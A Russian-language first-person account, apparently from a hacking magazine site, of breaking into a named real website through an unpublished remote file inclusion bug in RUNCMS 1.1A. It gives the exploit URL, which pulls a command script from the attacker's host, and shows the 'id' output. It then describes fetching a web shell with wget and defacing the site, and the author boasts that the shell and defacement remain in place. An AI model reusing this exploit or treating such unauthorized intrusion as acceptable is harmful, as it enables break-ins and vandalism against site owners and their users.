Всё началось с того что мой знакомый, нашёл уязвимость в модуле движка RUNCMS 1.1A. Это ОЧЕНЬ раскрученный и можно сказать известный движок в инете. Подумав сколько сайтов может "лечь" от этой баги, я не стал кидать информацию про эту багу на паблик. Задействовав всеми любимый
Гугл запросом "Powered by RUNCMS 1.1A", я увидел огромнейшее количество потенциально уязвимых сайтов.
После просмотра адресов первых сайтов, которые мне выдал поисковик, был выбран сайт
www.multicolor.ru. Составив ссылку вида:

http://www.multicolor.ru/modules/newbb_plus/class/ forumpollrenderer.php?bbPath[path]=http://
mysite.ru/cmd.php&cmd=id 

я с чувством радости увидел свои права:

uid=7609(multicolorru)
gid=7609(multicolorru) 
groups=7609(multicolorru)

Далее я узнал, что на сервере имеется утилита
wget. Команда wget http://www.mysite/shell.php сработала на ура, и веб-шелл от rush security team был уже доступен по адресу
http://www.multicolor.ru/modules/ newbb_plus/class/shell.php. Я был в директории
/home/multicolorru/www/ modules/newbb_plus/class. Перейдя на пару дир выше, я оказался в
/home/multicolorru/www. Там то и лежал нужный нам index.php :). Закачав на сервак нужную мне картинку,
я совершил красочный дефейс :)) Зайдя на сайт через несколько дней
я увидел, что дефейс так и висит на сайте (висит
и сейчас)! Про то, что там так и находится шелл от rst, я и не говорю.... 

Подведя небольшие итоги, я могу сказать, что бага в
RUNCMS является довольно "убойной" и на паблике пока информации про неё не было. На этой cms крутится много сайтов и
не исключенно, что начнётся целая волна взломов этого движка....

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии